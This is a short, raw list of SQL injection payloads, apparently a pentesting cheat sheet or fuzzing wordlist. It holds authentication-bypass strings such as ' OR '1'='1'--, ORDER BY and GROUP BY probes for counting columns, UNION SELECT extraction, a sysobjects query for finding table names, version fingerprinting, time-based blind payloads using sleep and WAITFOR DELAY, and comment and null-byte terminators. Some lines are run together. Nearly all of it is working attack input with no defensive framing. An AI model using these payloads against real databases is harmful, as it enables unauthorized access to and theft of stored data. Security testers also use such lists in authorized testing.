'
''
`
``
,
"
""
/
//
\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -ZAP' OR '1'='1'--
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x ' AND id IS NULL; -- '''''''''''''UNION SELECT '2 %00 /…/ addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator
@variable local variable @@variable global variable
AND 1 AND 0 AND true AND false 1-false 1-true 1*56 -2
1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+
1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based: ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'--
Comments:
/* C-style comment -- - SQL comment ;%00 Nullbyte ` Backtick